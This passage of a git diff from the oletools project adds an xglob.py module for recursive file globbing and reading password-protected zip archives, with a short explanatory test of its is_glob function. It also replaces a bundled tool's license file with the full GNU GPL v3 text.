+# this list of conditions and the following disclaimer in the documentation
+# and/or other materials provided with the distribution.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
+# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+
+#------------------------------------------------------------------------------
+# CHANGELOG:
+# 2013-12-04 v0.01 PL: - scan several files from command line args
+# 2014-01-14 v0.02 PL: - added riglob, ziglob
+# 2014-12-26 v0.03 PL: - moved code from balbuzard into a separate package
+# 2015-01-03 v0.04 PL: - fixed issues in iter_files + yield container name
+# 2016-02-24 v0.05 PL: - do not stop on exceptions, return them as data
+# - fixed issue when using wildcards with empty path
+# 2016-04-28 v0.06 CH: - improved handling of non-existing files
+# (by Christian Herdtweck)
+# 2018-12-08 v0.07 PL: - fixed issue #373, zip password must be bytes
+
+__version__ = '0.07'
+
+
+#=== IMPORTS =================================================================
+
+import os, fnmatch, glob, zipfile
+
+#=== EXCEPTIONS ==============================================================
+
+class PathNotFoundException(Exception):
+ """ raised if given a fixed file/dir (not a glob) that does not exist """
+ def __init__(self, path):
+ super(PathNotFoundException, self).__init__(
+ 'Given path does not exist: %r' % path)
+
+
+#=== FUNCTIONS ===============================================================
+
+# recursive glob function to find files in any subfolder:
+# inspired by http://stackoverflow.com/questions/14798220/how-can-i-search-sub-folders-using-glob-glob-module-in-python
+def rglob (path, pattern='*.*'):
+ """
+ Recursive glob:
+ similar to glob.glob, but finds files recursively in all subfolders of path.
+ path: root directory in which to search for files
+ pattern: pattern for filenames, using wildcards, e.g. *.txt
+ """
+ #TODO: more compatible API with glob: use single param, split path from pattern
+ return [os.path.join(dirpath, f)
+ for dirpath, dirnames, files in os.walk(path)
+ for f in fnmatch.filter(files, pattern)]
+
+
+def riglob (pathname):
+ """
+ Recursive iglob:
+ similar to glob.iglob, but finds files recursively in all subfolders of path.
+ pathname: root directory in which to search, followed by a pattern for
+ filenames, using wildcards, e.g. *.txt
+ """
+ path, filespec = os.path.split(pathname)
+ # fix path if empty:
+ if path == '':
+ path = '.'
+ # print 'riglob: path=%r, filespec=%r' % (path, filespec)
+ for dirpath, dirnames, files in os.walk(path):
+ for f in fnmatch.filter(files, filespec):
+ yield os.path.join(dirpath, f)
+
+
+def ziglob (zipfileobj, pathname):
+ """
+ iglob in a zip:
+ similar to glob.iglob, but finds files within a zip archive.
+ - zipfileobj: zipfile.ZipFile object
+ - pathname: pattern for file paths within the archive, using wildcards,
+ e.g. *.txt
+ """
+ files = zipfileobj.namelist()
+ #for f in files: print f
+ for f in fnmatch.filter(files, pathname):
+ yield f
+
+
+def iter_files(files, recursive=False, zip_password=None, zip_fname='*'):
+ """
+ Open each file provided as argument:
+ - files is a list of arguments
+ - if zip_password is None, each file is listed without reading its content.
+ Wildcards are supported.
+ - otherwise, each file is opened as a zip archive with the provided password
+ - then files matching zip_fname are opened from the zip archive
+
+ Iterator: yields (container, filename, data) for each file. If zip_password is None,
+ only the filename is set; container and data are None. Otherwise container is the
+ filename of the container (zip file), and data is the file content (or an exception).
+ If a given filename is not a glob and does not exist, the triplet
+ (None, filename, PathNotFoundException) is yielded. (Globs matching nothing
+ do not trigger exceptions)
+ """
+ #TODO: catch exceptions and yield them for the caller (no file found, file is not zip, wrong password, etc)
+ #TODO: use logging instead of printing
+ #TODO: split in two simpler functions, the caller knows if it's a zip or not
+ # print 'iter_files: files=%r, recursive=%s' % (files, recursive)
+ # choose recursive or non-recursive iglob:
+ if recursive:
+ iglob = riglob
+ else:
+ iglob = glob.iglob
+ for filespec in files:
+ if not is_glob(filespec) and not os.path.exists(filespec):
+ yield None, filespec, PathNotFoundException(filespec)
+ continue
+ for filename in iglob(filespec):
+ if zip_password is not None:
+ # Each file is expected to be a zip archive:
+ # The zip password must be bytes, not unicode/str:
+ if not isinstance(zip_password, bytes):
+ zip_password = bytes(zip_password, encoding='utf8')
+ # print('Opening zip archive %s with provided password' % filename)
+ # print('zip password: %r' % zip_password)
+ # print(type(zip_password))
+ z = zipfile.ZipFile(filename, 'r')
+ #print 'Looking for file(s) matching "%s"' % zip_fname
+ for subfilename in ziglob(z, zip_fname):
+ #print 'Opening file in zip archive:', filename
+ try:
+ data = z.read(subfilename, zip_password)
+ yield filename, subfilename, data
+ except Exception as e:
+ yield filename, subfilename, e
+ z.close()
+ else:
+ # normal file
+ # do not read the file content, just yield the filename
+ yield None, filename, None
+ #print 'Opening file', filename
+ #data = open(filename, 'rb').read()
+ #yield None, filename, data
+
+
+def is_glob(filespec):
+ """ determine if given file specification is a single file name or a glob
+
+ python's glob and fnmatch can only interpret ?, *, [list], and [ra-nge],
+ (and combinations: hex_*_[A-Fabcdef0-9]).
+ The special chars *?[-] can only be escaped using []
+ --> file_name is not a glob
+ --> file?name is a glob
+ --> file* is a glob
+ --> file[-._]name is a glob
+ --> file[?]name is not a glob (matches literal "file?name")
+ --> file[*]name is not a glob (matches literal "file*name")
+ --> file[-]name is not a glob (matches literal "file-name")
+ --> file-name is not a glob
+
+ Also, obviously incorrect globs are treated as non-globs
+ --> file[name is not a glob (matches literal "file[name")
+ --> file]-[name is treated as a glob
+ (it is not a valid glob but detecting errors like this requires
+ sophisticated regular expression matching)
+
+ Python's glob also works with globs in directory-part of path
+ --> dir-part of path is analyzed just like filename-part
+ --> thirdparty/*/xglob.py is a (valid) glob
+
+ TODO: create a correct regexp to test for validity of ranges
+ """
+
+ # remove escaped special chars
+ cleaned = filespec.replace('[*]', '').replace('[?]', '') \
+ .replace('[[]', '').replace('[]]', '').replace('[-]', '')
+
+ # check if special chars remain
+ return '*' in cleaned or '?' in cleaned or \
+ ('[' in cleaned and ']' in cleaned)
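The `is_glob` heuristic added above is easy to exercise against the cases listed in its docstring. This self-contained sketch copies the escape-stripping logic from the patch so the documented behavior can be checked in isolation (it is an illustration, not part of the patch itself):

```python
def is_glob(filespec):
    """Return True if filespec contains unescaped glob wildcards (*, ?, [...])."""
    # remove the escaped special chars [*], [?], [[], []] and [-],
    # which match literal characters rather than acting as wildcards
    cleaned = filespec.replace('[*]', '').replace('[?]', '') \
                      .replace('[[]', '').replace('[]]', '').replace('[-]', '')
    # anything left over is a real wildcard
    return '*' in cleaned or '?' in cleaned or \
           ('[' in cleaned and ']' in cleaned)

# cases taken from the docstring above:
assert not is_glob('file_name')      # plain name
assert is_glob('file?name')          # single-char wildcard
assert is_glob('file*')              # multi-char wildcard
assert is_glob('file[-._]name')      # character class
assert not is_glob('file[?]name')    # escaped '?', matches literal "file?name"
assert not is_glob('file[*]name')    # escaped '*', matches literal "file*name"
assert not is_glob('file[-]name')    # escaped '-', matches literal "file-name"
assert not is_glob('file-name')      # plain name with a dash
```

The same escape convention is what `glob` and `fnmatch` implement, so `iter_files` can safely route non-globs through the `os.path.exists` check without false positives.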
diff --git a/oletools/thirdparty/xxxswf/LICENSE.txt b/oletools/thirdparty/xxxswf/LICENSE.txt
index 9c42dabf..20d40b6b 100644
--- a/oletools/thirdparty/xxxswf/LICENSE.txt
+++ b/oletools/thirdparty/xxxswf/LICENSE.txt
@@ -1,3 +1,674 @@
-xxxswf.py is published by Alexander Hanel on
-http://hooked-on-mnemonics.blogspot.nl/2011/12/xxxswfpy.html
-without explicit license.
\ No newline at end of file
+ GNU GENERAL PUBLIC LICENSE
+ Version 3, 29 June 2007
+
+ Copyright (C) 2007 Free Software Foundation, Inc.
+ Everyone is permitted to copy and distribute verbatim copies
+ of this license document, but changing it is not allowed.
+
+ Preamble
+
+ The GNU General Public License is a free, copyleft license for
+software and other kinds of works.
+
+ The licenses for most software and other practical works are designed
+to take away your freedom to share and change the works. By contrast,
+the GNU General Public License is intended to guarantee your freedom to
+share and change all versions of a program--to make sure it remains free
+software for all its users. We, the Free Software Foundation, use the
+GNU General Public License for most of our software; it applies also to
+any other work released this way by its authors. You can apply it to
+your programs, too.
+
+ When we speak of free software, we are referring to freedom, not
+price. Our General Public Licenses are designed to make sure that you
+have the freedom to distribute copies of free software (and charge for
+them if you wish), that you receive source code or can get it if you
+want it, that you can change the software or use pieces of it in new
+free programs, and that you know you can do these things.
+
+ To protect your rights, we need to prevent others from denying you
+these rights or asking you to surrender the rights. Therefore, you have
+certain responsibilities if you distribute copies of the software, or if
+you modify it: responsibilities to respect the freedom of others.
+
+ For example, if you distribute copies of such a program, whether
+gratis or for a fee, you must pass on to the recipients the same
+freedoms that you received. You must make sure that they, too, receive
+or can get the source code. And you must show them these terms so they
+know their rights.
+
+ Developers that use the GNU GPL protect your rights with two steps:
+(1) assert copyright on the software, and (2) offer you this License
+giving you legal permission to copy, distribute and/or modify it.
+
+ For the developers' and authors' protection, the GPL clearly explains
+that there is no warranty for this free software. For both users' and
+authors' sake, the GPL requires that modified versions be marked as
+changed, so that their problems will not be attributed erroneously to
+authors of previous versions.
+
+ Some devices are designed to deny users access to install or run
+modified versions of the software inside them, although the manufacturer
+can do so. This is fundamentally incompatible with the aim of
+protecting users' freedom to change the software. The systematic
+pattern of such abuse occurs in the area of products for individuals to
+use, which is precisely where it is most unacceptable. Therefore, we
+have designed this version of the GPL to prohibit the practice for those
+products. If such problems arise substantially in other domains, we
+stand ready to extend this provision to those domains in future versions
+of the GPL, as needed to protect the freedom of users.
+
+ Finally, every program is threatened constantly by software patents.
+States should not allow patents to restrict development and use of
+software on general-purpose computers, but in those that do, we wish to
+avoid the special danger that patents applied to a free program could
+make it effectively proprietary. To prevent this, the GPL assures that
+patents cannot be used to render the program non-free.
+
+ The precise terms and conditions for copying, distribution and
+modification follow.
+
+ TERMS AND CONDITIONS
+
+ 0. Definitions.
+
+ "This License" refers to version 3 of the GNU General Public License.
+
+ "Copyright" also means copyright-like laws that apply to other kinds of
+works, such as semiconductor masks.
+
+ "The Program" refers to any copyrightable work licensed under this
+License. Each licensee is addressed as "you". "Licensees" and
+"recipients" may be individuals or organizations.
+
+ To "modify" a work means to copy from or adapt all or part of the work
+in a fashion requiring copyright permission, other than the making of an
+exact copy. The resulting work is called a "modified version" of the
+earlier work or a work "based on" the earlier work.
+
+ A "covered work" means either the unmodified Program or a work based
+on the Program.
+
+ To "propagate" a work means to do anything with it that, without
+permission, would make you directly or secondarily liable for
+infringement under applicable copyright law, except executing it on a
+computer or modifying a private copy. Propagation includes copying,
+distribution (with or without modification), making available to the
+public, and in some countries other activities as well.
+
+ To "convey" a work means any kind of propagation that enables other
+parties to make or receive copies. Mere interaction with a user through
+a computer network, with no transfer of a copy, is not conveying.
+
+ An interactive user interface displays "Appropriate Legal Notices"
+to the extent that it includes a convenient and prominently visible
+feature that (1) displays an appropriate copyright notice, and (2)
+tells the user that there is no warranty for the work (except to the
+extent that warranties are provided), that licensees may convey the
+work under this License, and how to view a copy of this License. If
+the interface presents a list of user commands or options, such as a
+menu, a prominent item in the list meets this criterion.
+
+ 1. Source Code.
+
+ The "source code" for a work means the preferred form of the work
+for making modifications to it. "Object code" means any non-source
+form of a work.
+
+ A "Standard Interface" means an interface that either is an official
+standard defined by a recognized standards body, or, in the case of
+interfaces specified for a particular programming language, one that
+is widely used among developers working in that language.
+
+ The "System Libraries" of an executable work include anything, other
+than the work as a whole, that (a) is included in the normal form of
+packaging a Major Component, but which is not part of that Major
+Component, and (b) serves only to enable use of the work with that
+Major Component, or to implement a Standard Interface for which an
+implementation is available to the public in source code form. A
+"Major Component", in this context, means a major essential component
+(kernel, window system, and so on) of the specific operating system
+(if any) on which the executable work runs, or a compiler used to
+produce the work, or an object code interpreter used to run it.
+
+ The "Corresponding Source" for a work in object code form means all
+the source code needed to generate, install, and (for an executable
+work) run the object code and to modify the work, including scripts to
+control those activities. However, it does not include the work's
+System Libraries, or general-purpose tools or generally available free
+programs which are used unmodified in performing those activities but
+which are not part of the work. For example, Corresponding Source
+includes interface definition files associated with source files for
+the work, and the source code for shared libraries and dynamically
+linked subprograms that the work is specifically designed to require,
+such as by intimate data communication or control flow between those
+subprograms and other parts of the work.
+
+ The Corresponding Source need not include anything that users
+can regenerate automatically from other parts of the Corresponding
+Source.
+
+ The Corresponding Source for a work in source code form is that
+same work.
+
+ 2. Basic Permissions.
+
+ All rights granted under this License are granted for the term of
+copyright on the Program, and are irrevocable provided the stated
+conditions are met. This License explicitly affirms your unlimited
+permission to run the unmodified Program. The output from running a
+covered work is covered by this License only if the output, given its
+content, constitutes a covered work. This License acknowledges your
+rights of fair use or other equivalent, as provided by copyright law.
+
+ You may make, run and propagate covered works that you do not
+convey, without conditions so long as your license otherwise remains
+in force. You may convey covered works to others for the sole purpose
+of having them make modifications exclusively for you, or provide you
+with facilities for running those works, provided that you comply with
+the terms of this License in conveying all material for which you do
+not control copyright. Those thus making or running the covered works
+for you must do so exclusively on your behalf, under your direction
+and control, on terms that prohibit them from making any copies of
+your copyrighted material outside their relationship with you.
+
+ Conveying under any other circumstances is permitted solely under
+the conditions stated below. Sublicensing is not allowed; section 10
+makes it unnecessary.
+
+ 3. Protecting Users' Legal Rights From Anti-Circumvention Law.
+
+ No covered work shall be deemed part of an effective technological
+measure under any applicable law fulfilling obligations under article
+11 of the WIPO copyright treaty adopted on 20 December 1996, or
+similar laws prohibiting or restricting circumvention of such
+measures.
+
+ When you convey a covered work, you waive any legal power to forbid
+circumvention of technological measures to the extent such circumvention
+is effected by exercising rights under this License with respect to
+the covered work, and you disclaim any intention to limit operation or
+modification of the work as a means of enforcing, against the work's
+users, your or third parties' legal rights to forbid circumvention of
+technological measures.
+
+ 4. Conveying Verbatim Copies.
+
+ You may convey verbatim copies of the Program's source code as you
+receive it, in any medium, provided that you conspicuously and
+appropriately publish on each copy an appropriate copyright notice;
+keep intact all notices stating that this License and any
+non-permissive terms added in accord with section 7 apply to the code;
+keep intact all notices of the absence of any warranty; and give all
+recipients a copy of this License along with the Program.
+
+ You may charge any price or no price for each copy that you convey,
+and you may offer support or warranty protection for a fee.
+
+ 5. Conveying Modified Source Versions.
+
+ You may convey a work based on the Program, or the modifications to
+produce it from the Program, in the form of source code under the
+terms of section 4, provided that you also meet all of these conditions:
+
+ a) The work must carry prominent notices stating that you modified
+ it, and giving a relevant date.
+
+ b) The work must carry prominent notices stating that it is
+ released under this License and any conditions added under section
+ 7. This requirement modifies the requirement in section 4 to
+ "keep intact all notices".
+
+ c) You must license the entire work, as a whole, under this
+ License to anyone who comes into possession of a copy. This
+ License will therefore apply, along with any applicable section 7
+ additional terms, to the whole of the work, and all its parts,
+ regardless of how they are packaged. This License gives no
+ permission to license the work in any other way, but it does not
+ invalidate such permission if you have separately received it.
+
+ d) If the work has interactive user interfaces, each must display
+ Appropriate Legal Notices; however, if the Program has interactive
+ interfaces that do not display Appropriate Legal Notices, your
+ work need not make them do so.
+
+ A compilation of a covered work with other separate and independent
+works, which are not by their nature extensions of the covered work,
+and which are not combined with it such as to form a larger program,
+in or on a volume of a storage or distribution medium, is called an
+"aggregate" if the compilation and its resulting copyright are not
+used to limit the access or legal rights of the compilation's users
+beyond what the individual works permit. Inclusion of a covered work
+in an aggregate does not cause this License to apply to the other
+parts of the aggregate.
+
+ 6. Conveying Non-Source Forms.
+
+ You may convey a covered work in object code form under the terms
+of sections 4 and 5, provided that you also convey the
+machine-readable Corresponding Source under the terms of this License,
+in one of these ways:
+
+ a) Convey the object code in, or embodied in, a physical product
+ (including a physical distribution medium), accompanied by the
+ Corresponding Source fixed on a durable physical medium
+ customarily used for software interchange.
+
+ b) Convey the object code in, or embodied in, a physical product
+ (including a physical distribution medium), accompanied by a
+ written offer, valid for at least three years and valid for as
+ long as you offer spare parts or customer support for that product
+ model, to give anyone who possesses the object code either (1) a
+ copy of the Corresponding Source for all the software in the
+ product that is covered by this License, on a durable physical
+ medium customarily used for software interchange, for a price no
+ more than your reasonable cost of physically performing this
+ conveying of source, or (2) access to copy the
+ Corresponding Source from a network server at no charge.
+
+ c) Convey individual copies of the object code with a copy of the
+ written offer to provide the Corresponding Source. This
+ alternative is allowed only occasionally and noncommercially, and
+ only if you received the object code with such an offer, in accord
+ with subsection 6b.
+
+ d) Convey the object code by offering access from a designated
+ place (gratis or for a charge), and offer equivalent access to the
+ Corresponding Source in the same way through the same place at no
+ further charge. You need not require recipients to copy the
+ Corresponding Source along with the object code. If the place to
+ copy the object code is a network server, the Corresponding Source
+ may be on a different server (operated by you or a third party)
+ that supports equivalent copying facilities, provided you maintain
+ clear directions next to the object code saying where to find the
+ Corresponding Source. Regardless of what server hosts the
+ Corresponding Source, you remain obligated to ensure that it is
+ available for as long as needed to satisfy these requirements.
+
+ e) Convey the object code using peer-to-peer transmission, provided
+ you inform other peers where the object code and Corresponding
+ Source of the work are being offered to the general public at no
+ charge under subsection 6d.
+
+ A separable portion of the object code, whose source code is excluded
+from the Corresponding Source as a System Library, need not be
+included in conveying the object code work.
+
+ A "User Product" is either (1) a "consumer product", which means any
+tangible personal property which is normally used for personal, family,
+or household purposes, or (2) anything designed or sold for incorporation
+into a dwelling. In determining whether a product is a consumer product,
+doubtful cases shall be resolved in favor of coverage. For a particular
+product received by a particular user, "normally used" refers to a
+typical or common use of that class of product, regardless of the status
+of the particular user or of the way in which the particular user
+actually uses, or expects or is expected to use, the product. A product
+is a consumer product regardless of whether the product has substantial
+commercial, industrial or non-consumer uses, unless such uses represent
+the only significant mode of use of the product.
+
+ "Installation Information" for a User Product means any methods,
+procedures, authorization keys, or other information required to install
+and execute modified versions of a covered work in that User Product from
+a modified version of its Corresponding Source. The information must
+suffice to ensure that the continued functioning of the modified object
+code is in no case prevented or interfered with solely because
+modification has been made.
+
+ If you convey an object code work under this section in, or with, or
+specifically for use in, a User Product, and the conveying occurs as
+part of a transaction in which the right of possession and use of the
+User Product is transferred to the recipient in perpetuity or for a
+fixed term (regardless of how the transaction is characterized), the
+Corresponding Source conveyed under this section must be accompanied
+by the Installation Information. But this requirement does not apply
+if neither you nor any third party retains the ability to install
+modified object code on the User Product (for example, the work has
+been installed in ROM).
+
+ The requirement to provide Installation Information does not include a
+requirement to continue to provide support service, warranty, or updates
+for a work that has been modified or installed by the recipient, or for
+the User Product in which it has been modified or installed. Access to a
+network may be denied when the modification itself materially and
+adversely affects the operation of the network or violates the rules and
+protocols for communication across the network.
+
+ Corresponding Source conveyed, and Installation Information provided,
+in accord with this section must be in a format that is publicly
+documented (and with an implementation available to the public in
+source code form), and must require no special password or key for
+unpacking, reading or copying.
+
+ 7. Additional Terms.
+
+ "Additional permissions" are terms that supplement the terms of this
+License by making exceptions from one or more of its conditions.
+Additional permissions that are applicable to the entire Program shall
+be treated as though they were included in this License, to the extent
+that they are valid under applicable law. If additional permissions
+apply only to part of the Program, that part may be used separately
+under those permissions, but the entire Program remains governed by
+this License without regard to the additional permissions.
+
+ When you convey a copy of a covered work, you may at your option
+remove any additional permissions from that copy, or from any part of
+it. (Additional permissions may be written to require their own
+removal in certain cases when you modify the work.) You may place
+additional permissions on material, added by you to a covered work,
+for which you have or can give appropriate copyright permission.
+
+ Notwithstanding any other provision of this License, for material you
+add to a covered work, you may (if authorized by the copyright holders of
+that material) supplement the terms of this License with terms:
+
+ a) Disclaiming warranty or limiting liability differently from the
+ terms of sections 15 and 16 of this License; or
+
+ b) Requiring preservation of specified reasonable legal notices or
+ author attributions in that material or in the Appropriate Legal
+ Notices displayed by works containing it; or
+
+ c) Prohibiting misrepresentation of the origin of that material, or
+ requiring that modified versions of such material be marked in
+ reasonable ways as different from the original version; or
+
+ d) Limiting the use for publicity purposes of names of licensors or
+ authors of the material; or
+
+ e) Declining to grant rights under trademark law for use of some
+ trade names, trademarks, or service marks; or
+
+ f) Requiring indemnification of licensors and authors of that
+ material by anyone who conveys the material (or modified versions of
+ it) with contractual assumptions of liability to the recipient, for
+ any liability that these contractual assumptions directly impose on
+ those licensors and authors.
+
+ All other non-permissive additional terms are considered "further
+restrictions" within the meaning of section 10. If the Program as you
+received it, or any part of it, contains a notice stating that it is
+governed by this License along with a term that is a further
+restriction, you may remove that term. If a license document contains
+a further restriction but permits relicensing or conveying under this
+License, you may add to a covered work material governed by the terms
+of that license document, provided that the further restriction does
+not survive such relicensing or conveying.
+
+ If you add terms to a covered work in accord with this section, you
+must place, in the relevant source files, a statement of the
+additional terms that apply to those files, or a notice indicating
+where to find the applicable terms.
+
+ Additional terms, permissive or non-permissive, may be stated in the
+form of a separately written license, or stated as exceptions;
+the above requirements apply either way.
+
+ 8. Termination.
+
+ You may not propagate or modify a covered work except as expressly
+provided under this License. Any attempt otherwise to propagate or
+modify it is void, and will automatically terminate your rights under
+this License (including any patent licenses granted under the third
+paragraph of section 11).
+
+ However, if you cease all violation of this License, then your
+license from a particular copyright holder is reinstated (a)
+provisionally, unless and until the copyright holder explicitly and
+finally terminates your license, and (b) permanently, if the copyright
+holder fails to notify you of the violation by some reasonable means
+prior to 60 days after the cessation.
+
+ Moreover, your license from a particular copyright holder is
+reinstated permanently if the copyright holder notifies you of the
+violation by some reasonable means, this is the first time you have
+received notice of violation of this License (for any work) from that
+copyright holder, and you cure the violation prior to 30 days after
+your receipt of the notice.
+
+ Termination of your rights under this section does not terminate the
+licenses of parties who have received copies or rights from you under
+this License. If your rights have been terminated and not permanently
+reinstated, you do not qualify to receive new licenses for the same
+material under section 10.
+
+ 9. Acceptance Not Required for Having Copies.
+
+ You are not required to accept this License in order to receive or
+run a copy of the Program. Ancillary propagation of a covered work
+occurring solely as a consequence of using peer-to-peer transmission
+to receive a copy likewise does not require acceptance. However,
+nothing other than this License grants you permission to propagate or
+modify any covered work. These actions infringe copyright if you do
+not accept this License. Therefore, by modifying or propagating a
+covered work, you indicate your acceptance of this License to do so.
+
+ 10. Automatic Licensing of Downstream Recipients.
+
+ Each time you convey a covered work, the recipient automatically
+receives a license from the original licensors, to run, modify and
+propagate that work, subject to this License. You are not responsible
+for enforcing compliance by third parties with this License.
+
+ An "entity transaction" is a transaction transferring control of an
+organization, or substantially all assets of one, or subdividing an
+organization, or merging organizations. If propagation of a covered
+work results from an entity transaction, each party to that
+transaction who receives a copy of the work also receives whatever
+licenses to the work the party's predecessor in interest had or could
+give under the previous paragraph, plus a right to possession of the
+Corresponding Source of the work from the predecessor in interest, if
+the predecessor has it or can get it with reasonable efforts.
+
+ You may not impose any further restrictions on the exercise of the
+rights granted or affirmed under this License. For example, you may
+not impose a license fee, royalty, or other charge for exercise of
+rights granted under this License, and you may not initiate litigation
+(including a cross-claim or counterclaim in a lawsuit) alleging that
+any patent claim is infringed by making, using, selling, offering for
+sale, or importing the Program or any portion of it.
+
+ 11. Patents.
+
+ A "contributor" is a copyright holder who authorizes use under this
+License of the Program or a work on which the Program is based. The
+work thus licensed is called the contributor's "contributor version".
+
+ A contributor's "essential patent claims" are all patent claims
+owned or controlled by the contributor, whether already acquired or
+hereafter acquired, that would be infringed by some manner, permitted
+by this License, of making, using, or selling its contributor version,
+but do not include claims that would be infringed only as a
+consequence of further modification of the contributor version. For
+purposes of this definition, "control" includes the right to grant
+patent sublicenses in a manner consistent with the requirements of
+this License.
+
+ Each contributor grants you a non-exclusive, worldwide, royalty-free
+patent license under the contributor's essential patent claims, to
+make, use, sell, offer for sale, import and otherwise run, modify and
+propagate the contents of its contributor version.
+
+ In the following three paragraphs, a "patent license" is any express
+agreement or commitment, however denominated, not to enforce a patent
+(such as an express permission to practice a patent or covenant not to
+sue for patent infringement). To "grant" such a patent license to a
+party means to make such an agreement or commitment not to enforce a
+patent against the party.
+
+ If you convey a covered work, knowingly relying on a patent license,
+and the Corresponding Source of the work is not available for anyone
+to copy, free of charge and under the terms of this License, through a
+publicly available network server or other readily accessible means,
+then you must either (1) cause the Corresponding Source to be so
+available, or (2) arrange to deprive yourself of the benefit of the
+patent license for this particular work, or (3) arrange, in a manner
+consistent with the requirements of this License, to extend the patent
+license to downstream recipients. "Knowingly relying" means you have
+actual knowledge that, but for the patent license, your conveying the
+covered work in a country, or your recipient's use of the covered work
+in a country, would infringe one or more identifiable patents in that
+country that you have reason to believe are valid.
+
+ If, pursuant to or in connection with a single transaction or
+arrangement, you convey, or propagate by procuring conveyance of, a
+covered work, and grant a patent license to some of the parties
+receiving the covered work authorizing them to use, propagate, modify
+or convey a specific copy of the covered work, then the patent license
+you grant is automatically extended to all recipients of the covered
+work and works based on it.
+
+ A patent license is "discriminatory" if it does not include within
+the scope of its coverage, prohibits the exercise of, or is
+conditioned on the non-exercise of one or more of the rights that are
+specifically granted under this License. You may not convey a covered
+work if you are a party to an arrangement with a third party that is
+in the business of distributing software, under which you make payment
+to the third party based on the extent of your activity of conveying
+the work, and under which the third party grants, to any of the
+parties who would receive the covered work from you, a discriminatory
+patent license (a) in connection with copies of the covered work
+conveyed by you (or copies made from those copies), or (b) primarily
+for and in connection with specific products or compilations that
+contain the covered work, unless you entered into that arrangement,
+or that patent license was granted, prior to 28 March 2007.
+
+ Nothing in this License shall be construed as excluding or limiting
+any implied license or other defenses to infringement that may
+otherwise be available to you under applicable patent law.
+
+ 12. No Surrender of Others' Freedom.
+
+ If conditions are imposed on you (whether by court order, agreement or
+otherwise) that contradict the conditions of this License, they do not
+excuse you from the conditions of this License. If you cannot convey a
+covered work so as to satisfy simultaneously your obligations under this
+License and any other pertinent obligations, then as a consequence you may
+not convey it at all. For example, if you agree to terms that obligate you
+to collect a royalty for further conveying from those to whom you convey
+the Program, the only way you could satisfy both those terms and this
+License would be to refrain entirely from conveying the Program.
+
+ 13. Use with the GNU Affero General Public License.
+
+ Notwithstanding any other provision of this License, you have
+permission to link or combine any covered work with a work licensed
+under version 3 of the GNU Affero General Public License into a single
+combined work, and to convey the resulting work. The terms of this
+License will continue to apply to the part which is the covered work,
+but the special requirements of the GNU Affero General Public License,
+section 13, concerning interaction through a network will apply to the
+combination as such.
+
+ 14. Revised Versions of this License.
+
+ The Free Software Foundation may publish revised and/or new versions of
+the GNU General Public License from time to time. Such new versions will
+be similar in spirit to the present version, but may differ in detail to
+address new problems or concerns.
+
+ Each version is given a distinguishing version number. If the
+Program specifies that a certain numbered version of the GNU General
+Public License "or any later version" applies to it, you have the
+option of following the terms and conditions either of that numbered
+version or of any later version published by the Free Software
+Foundation. If the Program does not specify a version number of the
+GNU General Public License, you may choose any version ever published
+by the Free Software Foundation.
+
+ If the Program specifies that a proxy can decide which future
+versions of the GNU General Public License can be used, that proxy's
+public statement of acceptance of a version permanently authorizes you
+to choose that version for the Program.
+
+ Later license versions may give you additional or different
+permissions. However, no additional obligations are imposed on any
+author or copyright holder as a result of your choosing to follow a
+later version.
+
+ 15. Disclaimer of Warranty.
+
+ THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
+APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
+HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
+OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
+THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
+IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
+ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
+
+ 16. Limitation of Liability.
+
+ IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
+WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
+THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
+GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
+USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
+DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
+PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
+EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
+SUCH DAMAGES.
+
+ 17. Interpretation of Sections 15 and 16.
+
+ If the disclaimer of warranty and limitation of liability provided
+above cannot be given local legal effect according to their terms,
+reviewing courts shall apply local law that most closely approximates
+an absolute waiver of all civil liability in connection with the
+Program, unless a warranty or assumption of liability accompanies a
+copy of the Program in return for a fee.
+
+ END OF TERMS AND CONDITIONS
+
+ How to Apply These Terms to Your New Programs
+
+ If you develop a new program, and you want it to be of the greatest
+possible use to the public, the best way to achieve this is to make it
+free software which everyone can redistribute and change under these terms.
+
+ To do so, attach the following notices to the program. It is safest
+to attach them to the start of each source file to most effectively
+state the exclusion of warranty; and each file should have at least
+the "copyright" line and a pointer to where the full notice is found.
+
+
+    <one line to give the program's name and a brief idea of what it does.>
